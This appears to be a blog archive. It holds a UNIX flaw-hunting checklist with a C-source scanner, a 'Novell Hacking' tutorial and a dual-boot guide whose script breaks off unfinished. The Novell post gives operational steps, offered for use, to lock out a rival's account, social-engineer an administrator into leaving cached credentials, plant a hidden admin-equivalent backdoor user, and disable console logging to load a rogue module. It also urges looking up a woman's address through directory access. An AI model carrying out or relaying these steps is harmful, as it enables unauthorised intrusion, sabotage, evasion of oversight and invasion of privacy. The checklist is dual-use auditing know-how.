ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e.
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c

PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.

TCOV:

CRASH: Posted to USENET (what FTP archive?) (descrip?)

PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Empirical Study of the Reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout on the environment in question, and the expected input is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).

Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
ie: the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy(), which is why a lot of src carries a bounded wrapper such as:
#define SCPYN(a, b) strncpy((a), (b), sizeof(a))
(note that strncpy() does not NUL-terminate when the source fills the whole
buffer, so callers still have to set a[sizeof(a) - 1] = '\0' themselves.)

2) SUID/SGID routines written in one of the shells, instead of C or
PERL.

3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.

4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.

5) Any program that uses relative path names inside the program.

6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).

7) Routines that don't check error return codes from system calls (ie:
fork(2), setuid(2), etc.), as in the famous rcp bug.

8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.

9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.

10) Look in man pages, and users guides for warnings against doing X, and
try variations of X. Ditto for "bugs" section.

11) Look for seldom used, or unusual functions or commands - read backwards.
In particular looking for undocumented flags/arguments may prove useful.
Check flags that were in prior releases, or in other OS versions. Check
for options that other programs might use. For instance telnet uses -h
option to login ...
right, as most login.c's I've seen have:
if (getuid() && hflag) {
    syslog(...);    /* log the attempt */
    exit(1);
}

12) Look for race conditions.

13) Failure of software to authenticate that it is really communicating
with the desired software or hardware module it wants to be accessing.

14) Lack of error detection to reset protection mechanisms following an
error.

15) Poor implementation resulting in, for example, condition codes being
improperly tested.

16) Implicit trust: Routine B assumes routine A's parameters are correct
because routine A is a system process.

17) System stores its data or references user parameters in the users
address space.

18) Inter process communication: return conditions (passwd OK, illegal
parameter, segment error, etc) can provide a significant wedge, esp.
when combined with (17).

19) User parameters may not be adequately checked.

20) Addresses that overlap or refer to system areas.

21) Condition code checks may be omitted.

22) Failure to anticipate unusual or extraordinary parameters.

23) Look for system levels where the modules involved were written by
different programmers, or groups of programmers - holes are likely
to be found.

24) Registers that point to the location of a parameter's value instead
of passing the value itself.

25) Any program running with system privileges. (too many progs are given
uid 0, to facilitate access to certain tables, etc.)

26) Group or world readable temporary files, buffers, etc.

27) Lack of threshold values, and lack of logging/notification once these
have been triggered.

28) Changing parameters of critical system areas prior to their execution
by a concurrent process. (race conditions)

29) Inadequate boundary checking at compile time, for example, a user
may be able to execute machine code disguised as data in a data area.
(if text and data areas are shared)

30) Improperly handling user generated asynchronous interrupts. Users
interrupting a process, performing an operation, and either returning
to continue the process or begin another will frequently leave the
system in an unprotected state. Partially written files are left open,
improper writing of protection infraction messages, improper setting
of protection bits, etc often occur.

31) Code that uses fopen(3) without setting the umask. ( eg: at(1), etc. )
In general, code that does not reset the real and effective uid before
forking.

32) Trace is your friend (or truss in SVR4) for helping figure out what
system calls a program is using.

33) Scan /usr/local fs's closely. Many admins will install software from
the net. Often you'll find tcpdump, top, nfswatch, ... suid'd root for
their ease of use.

34) Check suid programs to see if they are the ones originally put on the
system. Admins will sometimes put in a passwd replacement which is less
secure than the distributed version.

35) Look for programs that were there to install software or loadable
kernel modules.

36) Dynamically linked programs in general. Remember LD_PRELOAD, I think
that was the variable.

37) I/O channel programming is a prime target. Look for logical errors,
inconsistencies, and omissions.

38) See if it's possible for a I/O channel program to modify itself, loop
back, and then execute the newly modified code. (instruction pre-load
may screw this up)

39) If I/O channels act as independent processors they may have unlimited
access to memory, thus system code may be modified in memory prior to
execution.

40) Look for bugs requiring flaws in multiple pieces of software, i.e. say
program a can be used to change config file /etc/a now program b assumes
the information in a to be correct and this leads to unexpected results
(just look at how many programs trust /etc/utmp)

41) Any program, especially those suid/sgid, that allow shell escapes.
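The Tool Box's agrep queries and checks 1, 4, 5 and 7 above can be automated in a few dozen lines. The following is an added example, not part of the original posting: a first-pass scanner that flags unbounded copies, shell-spawning calls, relative exec paths and privilege calls whose return value is ignored, and answers the agrep AND query (privilege call AND shell spawn in the same file). SAMPLE_C is a constructed toy setuid helper that commits each of those mistakes; it is not code from the posting.

```python
"""Grep C source for the flaw classes in the list above.

Added example, not part of the original posting. It does in Python what the
Tool Box's agrep queries do: find unbounded copies (check 1), shell spawning
calls (check 4), relative exec paths (check 5) and privilege calls whose
return value is ignored (check 7), and say whether a file combines a
privilege call with a shell spawn (the agrep AND query). SAMPLE_C is a
constructed toy setuid helper with each mistake in it.
"""
import glob
import re
from typing import Dict, Iterable, List, NamedTuple


class Finding(NamedTuple):
    line: int
    check: str
    text: str


SAMPLE_C = """\
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/* constructed sample: a toy setuid helper with the classic mistakes */
int main(int argc, char **argv)
{
    char buf[64];
    gets(buf);
    strcpy(buf, argv[1]);
    setuid(getuid());
    system("mail root");
    execl("helper", "helper", (char *)0);
    if (setgid(getgid()) != 0)
        return 1;
    snprintf(buf, sizeof buf, "%s", argv[1]);
    return 0;
}
"""

# Check name and the pattern applied to each comment-stripped line.
CHECKS = [
    ("unbounded-copy", re.compile(r"\b(?:gets|strcpy|strcat|sprintf|scanf)\s*\(")),
    ("shell-spawn", re.compile(r"\b(?:system|popen|execlp|execvp)\s*\(")),
    ("relative-exec-path", re.compile(r"\b(?:execl|execle|execv|execve)\s*\(\s*\"(?!/)")),
    ("privilege-call", re.compile(r"\b(?:setuid|seteuid|setreuid|setgid|setegid|setregid)\s*\(")),
    # A privilege call that *starts* the statement has its return value thrown away.
    ("unchecked-privilege-call",
     re.compile(r"^(?:setuid|seteuid|setreuid|setgid|setegid|setregid)\s*\(")),
]
COMMENT_RE = re.compile(r"/\*.*?\*/|//.*$")


def scan_c_source(src: str) -> List[Finding]:
    findings = []
    for no, raw in enumerate(src.splitlines(), 1):
        code = COMMENT_RE.sub("", raw).strip()   # single-line comments only: a first pass
        if not code:
            continue
        for name, rx in CHECKS:
            if rx.search(code):
                findings.append(Finding(no, name, code))
    return findings


def privilege_and_spawn(findings: Iterable[Finding]) -> bool:
    """The agrep query {[suid() OR sgid()] AND [system() OR popen() ...]}:
    true when the same file both changes privilege and spawns a shell."""
    checks = {f.check for f in findings}
    return "privilege-call" in checks and "shell-spawn" in checks


def scan_files(pattern: str) -> Dict[str, List[Finding]]:
    """Run the checks over files matching a glob, e.g. '/usr/local/src/*.c'."""
    out = {}
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8", errors="replace") as fh:
            out[path] = scan_c_source(fh.read())
    return out


if __name__ == "__main__":
    import sys
    results = scan_files(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_c_source(SAMPLE_C)}
    for path, fs in results.items():
        print(f"{path}: privilege+spawn={privilege_and_spawn(fs)}")
        for f in fs:
            print(f"  {f.line:4d} {f.check:26s} {f.text}")
```

Like agrep, this is a lead generator rather than a verdict: every hit still has to be read in context (a snprintf or sscanf with an unbounded %s slips past these patterns, and a checked setuid() is not necessarily a correct one).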

 
posted by VaTsAl at 8:18 pm | Permalink 0 comments
Fake name generator
6 February 2007

http://www.fakenamegenerator.com/index.php

 
posted by VaTsAl at 8:11 pm | Permalink 0 comments
Novell Hacking !
9 October 2006

1. Introduction to Novell Netware
2. What is the 'console' and 'NDS'?
3. How do I know if they're running Novell?
4. I'm still not sure. I have a normal user account. How can I check with this?
5. What are the usual accounts and passwords and how do I find a valid account?
6. How do I lockout my enemies account?
7. Is there another easy way to get Admin access?
8. What about the Net Plug attack?
9. What's a backdoor and is it useful to me ?
10. Once I'm in, can I leave a back door?
11. Leaving an Admin level user in the NDS Tree
12. Okay, now how do I leave a backdoor into the server itself?
13. Accessing servers drives that you shouldn't be able to see


Introduction to Novell Netware

Novell Netware is a server based operating system for networks. Unlike Unix and NT, Netware isn't an all in one program. Let me explain. Netware itself runs on top of a version of DOS. The version that you might be familiar with is MS-DOS as this comes with Windows 95 and 98. Novell uses DR-DOS. This is very similar to MS-DOS and even uses the same sort of commands. When a Netware server starts up, first it loads up DR-DOS (also known as Caldera DOS because Caldera wrote it). Once DOS is started, Netware is loaded which then sets up the server itself. Once this has been done, the server is happily sitting on the network and awaiting requests. Netware has two main admin areas. First is the console and second is NDS.

What is the 'console' and 'NDS'?

The console is kind of like a DOS prompt. It takes commands in the same way as you'd expect and it looks almost the same too. The prompt though (the bit before you type in your commands) is somewhat different. In MS-DOS, you might get a prompt like this:

C:\WINDOWS >

This bit is the directory you are currently in. Here, you can see I'm in the
Windows directory. Netware doesn't have this and I'll explain why a little later

The 'C:\' shows the current drive. Netware has something like this but it doesn't actually show you what drive you are in. Again, I'll explain this later.


You've seen what the MS-DOS version is like. Here then is a sample from a Netware server named "Gandalf".

GANDALF :

The console is designed simply for managing the server itself. Not the files or its users as can be done with an NOS (Network Operating System) such as Linux. Commands entered here affect only the server that is in the prompt. In this case, only server Gandalf will be affected by my commands.
You can run or 'load' programs into the server in the form of NLMs ( Netware Loadable Modules). These can be seen as plugins for the server. Once run, the program will automatically be set-up. I'm mentioning this now because some of the best hacks require software to be loaded in at the server. I'll cover this later though.
The console can also be accessed from another computer using a piece of software called "RCONSOLE". This is a DOS based program so you will need to be able to run DOS programs on your machine. Many Admins disable this on user accounts and only have it active on Admin accounts. Even if you can run RCONSOLE, you will still need the remote console password to access the server. Most servers are left logged in at the console, so no logging in is necessary if you can reach the keyboard. However, servers tend to be physically well guarded!

NDS (Netware Directory Service) is where all the user and file information is stored. It is usually referred to as the "NDS Tree". You could easily compare it to a telephone directory. The NDS Tree holds all the information about a network. From the individual workstations to the users to the servers and the files stored on them. Because everything in general is managed through NDS, this is really the kind of access you want. Console access is useful (you can kick people you don't like off the server) but having the ability to alter anything on the network is much more fun.
The program that you need to access the NDS Tree is called 'nwadmn32.exe'. This is usually available somewhere on the system because it isn't directly a security risk. If you load it as a normal user, you will only have rights to alter some parts of that user such as the password. You may not be able to touch other people's information but you can usually read it. I'll come back to this later on.

How do I know if they're running Novell?

This is an easy one. Before you can use any machine on a Novell network, you must login. Novell like to show everyone just how good they think they are and splash their name and their stupid red 'N' logo everywhere that they feel they can get away with. This includes the login screen.
If for some reason you don't have this on your login screen but you still think that you are on a Novell network, take a closer look at the login screen. Most networks now use the latest client which supports contextless logins. Although this sounds complicated it isn't. Normally when you login to Novell, you must tell the server what 'context' you are in. This lets people have the same user names. For instance, for me to login to Gandalf I'd need to supply:

Miggyx.admin.users.abc


This is a short one. Many go much deeper than this and have six levels or more! Problem is humans aren't too hot at remembering these long login names. For this reason Novell brought out contextless logins. You pick an option from a drop down menu then fill in only the user name. For instance :


Context : Server Admins
User : miggyx


Passwd : ******


Instead of :

User : miggyx.admin.users.abc


Passwd : ******

Basically it was all done to make users lives easier. This option never appears on Unix or NT systems because they don't support multiple user names and thus context is irrelevant. If your system has this on the login screen, you definitely have Novell Netware.

I'm still not sure if I'm on a Novell network. I have a normal user account. How can I check with this?

Yes you can and if you have a real account, it will make your life a lot easier. It is easier to hack a system that you have some access to than to start from scratch. Login and see if you have a little red 'N' in the taskbar. This is Novell's little Admin tool for the user themselves and it has a few interesting properties too which I'll cover later. If you have this 'N' you are definitely on a Novell network. However some mean Admins turn off the nice little 'N'.
You can also right click on a network drive. A network drive is a directory on a remote computer that has been made to look like a hard drive on your machine. You'll find these in 'My Computer'. Right click on them. In this menu, there will be several entries with the red 'N' next to them. Again this is a dead giveaway that you are running on a Novell network.

Hmmmm..... I don't have an account. What are the usual accounts and passwords and how do I find a valid account?

Well, there are quite a few standard user names and passwords that are used on Novell networks. However not all of them are used and sometimes not one is used. This list comes from the Netware Hack FAQ and I've found it to be quite comprehensive:

Account        Purpose
-------------  ------------------------------------------------------
PRINT          Attaching to a second server for printing
LASER          Attaching to a second server for printing
HPLASER        Attaching to a second server for printing
PRINTER        Attaching to a second server for printing
LASERWRITER    Attaching to a second server for printing
POST           Attaching to a second server for email
MAIL           Attaching to a second server for email
GATEWAY        Attaching a gateway machine to the server
GATE           Attaching a gateway machine to the server
ROUTER         Attaching an email router to the server
BACKUP         May have password/station restrictions (see below); used
               for backing up the server to a tape unit attached to a
               workstation. For complete backups, Supervisor equivalence
               is required.
WANGTEK        See BACKUP
FAX            Attaching a dedicated fax modem unit to the network
FAXUSER        Attaching a dedicated fax modem unit to the network
FAXWORKS       Attaching a dedicated fax modem unit to the network
TEST           A test user account for temp use
ARCHIVIST      Palindrome default account for backup
CHEY_ARCHSVR   An account for Arcserve to login to the server from
               the console for tape backup. Version 5.01g's
               password was WONDERLAND. Delete the Station
               Restrictions and use SUPER.EXE to toggle this
               account and you have an excellent backdoor.
ROOT           Found on Shiva LanRovers, gets you the command-line
               equiv of the AdminGUI. By default, no password. A lot of
               admins just use the AdminGUI and never set up a
               password.


Some of these are used quite often. ROOT is a good example because it also ties in with superuser access on Unix and Linux servers. Having a user called root is quite common now. Accounts by the name 'Admin', 'Administrator' and 'Manager' are in common use too.

How do I find out if an account is valid?

This is surprisingly easy. Type in the username you are trying to check. Type in any password unless you know it (if you know the password then the account is obviously valid) and press enter. You will likely get an error message back. If the message says something along the lines of "Invalid password" or "Unknown Error" followed by a number, it is a fair bet that the account exists. If you get the Unknown Error message, it is likely that the account is there but has been locked out. This is also a cunning way of locking out the account of someone you don't like.

How do I lock out my enemies' accounts?

Well, this is particularly easy to do. Most Admins, for security, have a limit on how many times someone can login incorrectly before the account gets locked out. This is usually set to 5 times. Here's how you do it.

1. Type in your friend's/enemy's login name.
2. Put in an obviously wrong password. Anything will do.
3. Hit 'Enter'.
4. The computer should bounce back with an error about an invalid password. This is what we want so keep going.
5. Repeat from stage three until the server comes back with an unknown network error.

Once you get the unknown network error, you have successfully locked out the account. It won't work again until an admin manually unlocks it. This could mean a disabled account for hours or even days. Snik snik!



Is there an easy way to get Admin access?

This only works on Netware 3.*. You use a program called NW-HACK.exe. A nice little program that sits and waits till an Admin logs in and then creates a nice account for you with super user access. You will be able to find this program on the Internet but I'm not going to spend much time on it because it has a full set of docs with the program itself.

What about the Net Plug attack?

This is an attack that I worked out myself before I was given Admin status. It always works and I've yet to see it fail. Make sure you are at a Windows 95 or 98 machine. I doubt NT would be fooled by this trick but I don't have any NT machines so I can't test it for you.



Note: Most Admins believe that they are the most knowledgeable about their system. Many also believe that no one else knows much about computers. In other words, for whatever reasons, they are not too concerned about us, i.e. the idiots attacking their servers. Why? Because we aren't good enough. So why waste valuable time configuring security that won't be needed, eh? I think I've made my point. They don't see us as a threat. You don't consider a house spider a threat so you don't go round putting up netting to keep them out. Why? You can't be bothered. The same rule applies here. Even if you are a computer genius, play it dumb. Admins like to lecture the uninitiated and would love to appear smarter than you. This is the way you want it. The Admins will think you're a nice guy or gal, totally harmless. This sometimes gives you more leverage because they like you, so they'll be willing to help you. They also won't expect you to launch a huge assault on their servers either. However, sometimes there are some smart people out there who will notice your talents and pull you over to their side. This isn't a bad place to be and can be advantageous later.



First of all, login as yourself. Crash your computer and reset it. Walk over to your favourite admin (the one that hates you most is the best choice) and apologise for being an idiot but the computer won't let you login and could s/he please come and take a look for you. Mumbling and grumbling they'll come over. The best way to test if it is the machine is for them to login. Of course, they'll log in as an admin or equivalent. They'll check your account and see that your account is fine. They'll tell you to log onto another machine and your account will be okay. They'll now log off and walk off in disgust thinking you are a computer moron. Not so my friend, we've just done them good and proper!
Turn off the computer and pull out the network lead. Turn it back on again. The computer will detect that you aren't on a network and will dump you at a desktop with the restrictions of the last user. If this user is the admin then chances are that he or she will have full access to everything including DOS and drive access. Perfect for installing all those really kewl programs you have on a disk in your pocket......
But you aren't on the network now. That's no fun is it? Shove the lead back in and try to access a network drive. This is the bit where you hope the Admins are sloppy or not computer geniuses. Windows by default caches ALL passwords so unless the Admins have told it not to (a key deep in the registry) then Windows will have a nice copy of their password. Go into 'My Computer' and click on a drive. Whoop with glee as Netware logs you in as an Admin. Why does this happen? Well, Windows still holds the username and password last used to access the drive. You are logged into Windows as Admin and Windows knows what credentials you last gave to the server. So it supplies them for you. Likewise, because you are now authenticated you now have full access to the NDS tree. Not only can you read but you can now write, modify, delete, etc. Much more fun!
Now, this is the bit where you have to be sneaky. You have to make a new account for yourself or upgrade your old one. There are pros and cons to each of your choices. If you alter your existing account and they check it for some reason (maybe you got locked out?) they'll notice you have admin rights and shoot you. If you make a new user, it might get found quicker but there is no way to point to you (it was created by user admin after all, tee hee). The choice is yours. You can always do both.


What's a backdoor and is it useful to me ?

A back door like the name suggests is a way into a system without going through the front door. The front door being the proper way in. Your backdoor will give you full access (or whatever it was set-up to do) without anyone else knowing about it.
It is useful to you because it gives you a lot of power and anonymity. People won't know that it was you that deleted that account or altered your reports. You'll be like the ghost in the machine. Invisible and all powerful. Doesn't that sound wonderful to you?

Once I'm in, can I leave a back door?

Yes, there are many different ways of leaving a back door and many different things a back door can be designed to do. Firstly, the most powerful backdoor is the one that gives you full access to an entire system. Unfortunately, these are the hardest to set-up (unless you did my Net Plug trick) and the Admins aren't blind. They'll notice that a new admin account has appeared. Unless of course you hide it. This isn't all that easy but it can be done. The second type of backdoor gives you access to the server (like rconsole). These aren't as powerful but they still have the ability to run things like the 'down' command. The 'Down' command shuts the server down and dumps it at a DOS prompt. Another powerful command is the load command. This sticks programs into memory. Unfortunately all but the most stupid Admins log the console.

Leaving an Admin level user in the NDS Tree

This is the best way of hiding a user in the NDS Tree. Most Admins have only been on the CNA (Certified Novell Administrator) course so won't have the expertise to locate the user even if they did think that it existed. Even if they have a CNE (Certified Novell Engineer) they aren't likely to find your user because not only don't they know where to look, they won't know your user is there. The best crimes aren't ones that you can get away with without being caught. The best crimes are ones that the victim doesn't even know have happened.
Anyway, here is what you have to do:

- Get logged in as Admin or equivalent (use the Net Plug trick).
- In NWADMIN highlight an existing container.
- Create a new container inside this container.
- Create a user inside this new container. No home directory.
- Give this user full Trustee Rights to their own user object.
- Give this user full Trustee Rights to the new container.
- Make this user security equivalent to Admin.
- Modify the ACL for the new user so they can't be seen.
- Adjust the Inherit Rights Filter on the new container so no one can see it.

I've not had the chance to really test this in the field. It worked for me, but whether it will go undetected in the field is another matter. It works fine in theory though.

Okay, now how do I leave a backdoor into the server itself?

This is a lot more difficult because you have to run a program on the server itself. You do this by using the load command. It will automatically load the program from the SYS: directory. You'd have to copy the files to this directory first. Because this dir is filled with NLMs, it will be a lot harder to locate your new program as a rogue. Problem is actually running it. As I said before most Admins run the console logging program called CONLOG. So now what? If we try anything it will be logged won't it? Sure, unless we turn off the logging program first tee hee. Type "unload conlog" without the quotes. This will stop logging console activity. Next type "load magicfile.nlm" with the name of your program and without the quotes. Next type "load conlog" again without the quotes. Loading up conlog is the last thing that you do before leaving the server.
Some Admins run a program called "Secure Console". This stops you from loading any more programs. The only way to get round this is to use the unload command again. However it is password protected. You can get past this too but it will take some guts to do and it will take out the server for a few minutes. Are you ready?

1. Type "Down" at the prompt. If there are any users logged in, it will warn you. Press Y to continue or N to cancel. Pressing Y will cut them off. Any system that is on the Novell network will report to its users that the server is going down. Try to do this at the end of the day when all the clients are turned off or when you've got a chance to reset them before someone sees the message.
2. Turn the machine off
3. Wait a few seconds
4. Then turn it on again
5. Run outside and wait for the server to come back up. It is not a good idea to get caught with the server in this state.
6. When the Admins rush in to find out why their precious server bit the dust, their last concern is whether secure console is running or not.
7. When they leave, wait a few minutes before going back in.
8. Go to the console and turn off the console logger
9. Run your nasty little program
10. Turn the logging program back on
11. Walk out of the room as a super user.

The program itself will not show up in the logs (because you stopped logging before you ran it). When they shut the server down, the program will no longer be resident. However, if you are taking the risk to run this program, make sure you also run something that will catch the rconsole password. Admins hardly EVER change this. They are far more careful with the NDS password and see no reason why anyone would be able to find or to use their little rconsole password. Once you have the rconsole password you don't really need a backdoor.


Accessing servers drives that you shouldn't be able to see

When you are using Novell, you have your home area mapped as a network drive. You can't press 'Up' to go higher because it will just take you to my computer. How do you get around this and why would you want to?
Well, most Admins don't login to everyone's user account to check that they are set-up correctly ( I know I wouldn't bother going through 1000 different accounts in the unlikely case that one of them is messed up). If they aren't set-up correctly, you might have access to other peoples home areas. Thing is though, how do you get there? You can't see higher than your own directory.
First of all, you have to find out what server you are connected to. This is pretty straightforward. Okay, go back to 'My Computer'. Right click on a network drive and hit properties. It will tell you what server it is mapped on. I'll use GANDALF as an example. My home directory is mapped to F:, however the real location of my home directory is \\gandalf\data1\users\yr12_990\miggyx\ . Now, I wouldn't have known that if I hadn't checked the properties. Admins usually assume you won't know or won't bother looking. The server name directly follows the '\\'. Go to the start menu and select run. Type in the server name. In my example this would be \\gandalf.
What if those pesky Admins have removed the Run command? Not a problem. Minimise all the windows so you are looking at your desktop. Right click and select New -> Shortcut. When asked what it should shortcut to, type in '\\servername'. Press 'Enter' a few times. You should get an icon on your desktop. Click this twice and it will pull up the server. Simple but effective. A word of caution though. Delete the shortcut after use using shift+del. NEVER use just the delete option. If you choose just to delete the file, it will go straight to the recycle bin. Sometimes users don't have access to it and so can't remove the file themselves. This is when those friendly Admins come along and see a nice shortcut to their server with your name on it. Not a good thing to be doing. Shift + Del removes the file directly. This also bypasses any logging software running on the machine itself. The Admins won't be able to get to the file assuming they know it exists in the first place. Best to play it safe.
Once you have access to the server itself (albeit only as yourself and not as an admin, unless your admin is really stupid), you might be able to browse around. For instance, I still had read access to everything in the \\gandalf\data1\users\yr12_990 directory. I could go in and read everyone's work (although I couldn't write to it) and pass it off as my own. Also, you'll be able to access some of the system directories. In here you'll find useful tools such as rconsole, fconsole, nwadmn32.exe and others. Running nwadmn32.exe as yourself only gives you your own rights to the NDS tree. The NDS tree (Netware Directory Service) contains everything on the entire network. Even if you've got very limited access, you will still see the whole tree. This includes the usernames for the Admins and all the services they are running. You may even have some ability to alter users in your group. It all depends on how your system is configured. Either way it can be a powerful information tool. Usually you can see everything but alter nothing. This is still useful. For instance, say there is this gal you really like and you would kill for her phone number and address. Why go through all the hassle? Most Admins stick all information about a user into their network. It makes sense really. Load up nwadmn32.exe (they can't restrict this because it would restrict all Windows programs and that would be really stupid), find her username and click twice. Bang, you can see all her details. Sure you can't actually alter them but you can read, can't you?
You should also be able to happily browse through the directories that you can see. Even if you aren't logged in as an Admin, it is likely you can find some fun files to play around with. If they need DOS access, you'd better log in as an Admin. If you've read the above, you should be able to get Admin status.

______________________________________________________

 
posted by VaTsAl at 8:32 pm | Permalink 0 comments
Dual Booting !!

Dual booting is a great way to get started learning Linux. It is also a great way to learn about some deeper issues of Windows. Another great thing about dual booting is that you can learn the intricacies of Linux without abandoning your knowledge of Windows. This is a great way to proceed for newbies. Dual booting will allow you to run Linux and Windows on the same hard drive so that you can have the best of both worlds. Although Linux out-performs Windows on most fronts, we are all consumers and as such we enjoy having some things come easily and effortlessly. Also, Windows tends to have more game selections and better documentation for some software. That said, there is an alternative to dual booting. You can always run WINE or VMWare on your Linux machine. WINE lets you run Windows programs in Linux. VMWare creates another 'layer' in your Linux system and allows you to install any Windows OS within the VMWare program. It has all the functions of a normal Windows box, because it is a normal Windows box! You could also run Windows and use VMWare to install Linux within Windows.

This tutorial will assume you have weighed the pros and cons of WINE, VMWare and dual booting and have decided that dual booting is the best for you. I dual boot because when you are running Windows or Linux you get full system resources devoted to that OS, whereas emulation programs are running one OS within another so you get much less performance from both when both are running. Of course, when VMWare is not running then the host OS runs normally. WINE has many other technical issues that I do not have time to work through. I can't run Linux exclusively because I work with folks that use Windows and we need to collaborate for development purposes. So dual booting it is.

During this tutorial I am using Windows 2000 SP1 and Slackware.

Step 1.


Load Windows 2000 on the first partition of the drive, if you are using the same drive for both operating systems. If you plan on using 2 hard drives, then put Windows 2000 on the primary drive. You need to have the Windows boot sector on the drive that will be looked at first by the BIOS when you turn on the PC. As long as that requirement is met I don't really care where you load Linux to, so long as you know! NTLDR must reside in your MBR for my method to work properly. You can also replace NTLDR with LILO or another dual OS boot program, but that is not covered here.

Step 2.
When Windows 2000 installs it writes to the master boot record (MBR) which then points to a file on the root of the system (the C drive in this instance) called "boot.ini". The "boot.ini" file points to the location of the files necessary to boot. If you are familiar with Linux and LILO (the LInux LOader) you'll have an idea of what the "boot.ini" file does, because it acts a little bit like the "lilo.conf" file. Anyway, the "boot.ini" file is what we will be modifying so the Windows boot loader knows there is another OS for booting; for now just find it. If you are unable to see it, then you may have "hide system files" turned on. Open an Explorer window, go to the Tools pull down menu and select Folder Options and then the View tab. There you should see radio buttons to Show hidden files and folders; check it, and uncheck Hide protected operating system files (Recommended), hit OK at the bottom and you should now be able to see boot.ini in the root directory.

Step 3.


Install Linux. You can use any distro. You must create a boot disk when the Linux install asks, because we will need to make the boot sector that LILO creates into a file so that the Windows 2000 boot loader can use it to start Linux. And since we are not installing LILO to the MBR (Master Boot Record for those who don't know), you'll have no way of getting Linux to boot and the long setup process will be for nothing. The alternative is to install to the first sector of the Linux partition. I tend to do both. If you load LILO to the first sector of the partition then you can use a boot program to point to NTLDR and LILO and allow you to choose which you want to boot from. This is the method I use. Also, if something goes wrong in this setup then you have LILO on disk and you can always boot from a:\ and you will have Linux.

Step 4.


Quick Review: Windows 2000 Pro is installed, Linux is installed and LILO is installed! Our next step is to extract the Linux boot sector and get it to Windows. I find it easiest to just copy the boot sector to a floppy disk, boot into Windows and copy it off the floppy. Boot into Linux by placing your LILO boot disk into your floppy drive and booting to a:\. You will first need to get the boot sector onto a floppy; to do that you must mount the floppy disk. To mount the floppy drive in Linux type the following command: "mount -t msdos /mnt/floppy". It is likely that the floppy is already mounted since you did just boot from it. Insert a DOS formatted floppy so that we can copy the LILO boot sector file to it once the file is created. The following command will copy the LILO boot sector (the first 512 bytes of the Linux partition, /dev/hda5 in this example) to a file that is 512 bytes big, right to the floppy, called "linux.bin". Don't forget to put a DOS formatted floppy in the drive! "dd if=/dev/hda5 bs=512 count=1 of=/mnt/floppy/linux.bin"






Step 5.


That should do it for the Linux part of this project. Remove the floppy and boot into Windows 2000 normally. Go to "Windows Explorer" and copy the file, "linux.bin", off the floppy to the root of your Windows 2000 drive [c:\]. Next, open the "boot.ini" file in "Notepad" and add the line c:\linux.bin="Slackware (or whatever)" to the end of the file, save it and you are done.

Step 6.


Reboot without any floppies in the drive and you should be able to choose which OS you want to boot into! If you have gone and turned off the display of other operating systems, you will need to turn that back on. If you don't know how or don't remember, right click on "My Computer", click on "Properties". This brings up the "System Properties" window; click on the "Advanced" tab and then the "Startup and Recovery" button at the bottom. You should see the first check box unchecked; simply put a check in the box and then set the number of seconds the display is up before booting into the default OS!

Step 7. Oh Shit!


So things were going well but when you rebooted there was no OS option. Well, good thing we have a back-up plan. Assuming you followed all the instructions above, you now have a LILO boot disk. If worst comes to worst you can always set your boot sequence in BIOS to a:\ c:\ to check whether LILO is in your drive. If that is not good enough, and modifying boot.ini did not work for you but you did place LILO in the first sector of its partition, then there is one more option. You can use a boot manager. My favorite is XOSL, but there are many to choose from. Do a search for boot manager, download the one you like, read the documentation and go to town. You want to find one that will not make you do any more partitioning. Boot managers scan your drive and find all your boot loaders, in this case LILO and NTLDR, and then allow you to choose which to use at start-up. The boot manager you use is up to you.
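The step that most often goes wrong in the procedure above is Step 4: the 512-byte file handed to boot.ini must really be a boot sector, so it pays to check it before rebooting. The script below is an added example, not part of the original post; it wraps the dd command from Step 4 in a function, verifies that the extracted file is exactly 512 bytes and ends with the 0x55 0xAA boot signature that every PC boot sector carries, and appends the boot.ini line from Step 5. The device path, file names and the constructed disk image used for the self-check are assumptions for illustration; on a real system you would point extract_boot_sector at the partition LILO was written to (such as /dev/hda5 in the post).

```bash
#!/bin/sh
# Added example (not from the original post). Assumes POSIX sh, dd, od, printf.

# Copy the first sector (512 bytes) of a device or image file to $2.
# This is the post's "dd if=/dev/hda5 bs=512 count=1 of=linux.bin" step.
extract_boot_sector() {
    src="$1"; dst="$2"
    dd if="$src" of="$dst" bs=512 count=1 2>/dev/null
}

# Return 0 if the file is exactly 512 bytes and bytes 510-511 are 0x55 0xAA.
# NTLDR will happily load a garbage file, so this is the sanity check to
# run before touching boot.ini.
is_valid_boot_sector() {
    f="$1"
    size=$(wc -c < "$f" | tr -d ' ')
    [ "$size" -eq 512 ] || return 1
    sig=$(od -An -tx1 -j 510 -N 2 "$f" | tr -d ' \n')
    [ "$sig" = "55aa" ]
}

# Append the Step 5 line, e.g. c:\linux.bin="Slackware", to a boot.ini file.
# boot.ini is a Windows text file, so the line gets a CRLF ending.
add_boot_ini_entry() {
    ini="$1"; label="$2"
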